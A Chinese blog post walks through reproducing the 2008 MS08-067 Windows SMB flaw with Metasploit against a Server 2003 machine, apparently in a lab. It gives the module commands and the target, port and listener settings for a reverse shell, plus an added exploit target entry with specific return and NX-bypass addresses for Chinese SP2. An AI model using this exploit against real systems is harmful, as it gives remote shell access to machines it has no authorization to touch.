MS08-067 远程执行代码 漏洞复现

漏洞编号:MS08-067
披露日期: 2008/10/22
受影响的操作系统:Windows 2000;XP;Server 2003;Server 2008;
 
目标系统 Microsoft(R) Windows(R) Server 2003, Enterprise Edition
使用工具metasploit 搜索漏洞库
search ms08_067

use 载入漏洞

 通过“show options"可以查看所需要的设置;

yes 都是可填的

使用" show targets"可以查看渗透攻击模块可以成功攻击的平台;

我们这里可以看到 有 windos 2003 sp1,sp2 ,xp,2000 更具系统选择利用的payload

即 设置”set target 34"

  设置攻击目标“set RHOST 目标ip地址”

  设置回传端口"set LPORT 5000"

  设置主机ip" set LHOST 主机ip“

运行exploit就可以看到成果了 等待反弹shell 但是这里遇到一个问题我的windows server 2003系统是中文的 不是英文的所以需要对ms08_067_netapi_ser2003_zh.rb   

进行修改 重新打开终端  然后切换到已下目录:/usr/share/metasploit-framework/modules/exploits/windows/smb

在ms08_067_netapi_ser2003_zh.rb中增加以下代码,修改是4个指针地址

 ['Windows 2003 SP2 Chinese (NX)',

           {

             'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)

             'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)

             'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)

             'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL

             'Scratch'   => 0x00020408,

           }

          ],

输入

vim ms08_067_netapi_ser2003_zh.rb

:set number 

输入 /Windows 2003 SP2

这里我们帮他构建一个   652 -659行复制   输入  10y   回车 

在p  复制到你想要的地方

在退出 exit   输入 msfconsole    

从新复现上面的步骤  search targets    可以看到我们刚刚添加的中文利用版本

  

重复上面的步骤 发现

让 目标重启  应该目标机已经崩溃 

尝试重启目标主机,执行相同操作,攻击成功。

 

 

posted @ 2019-05-01 15:04  紅人  阅读(2150)  评论(0编辑  收藏  举报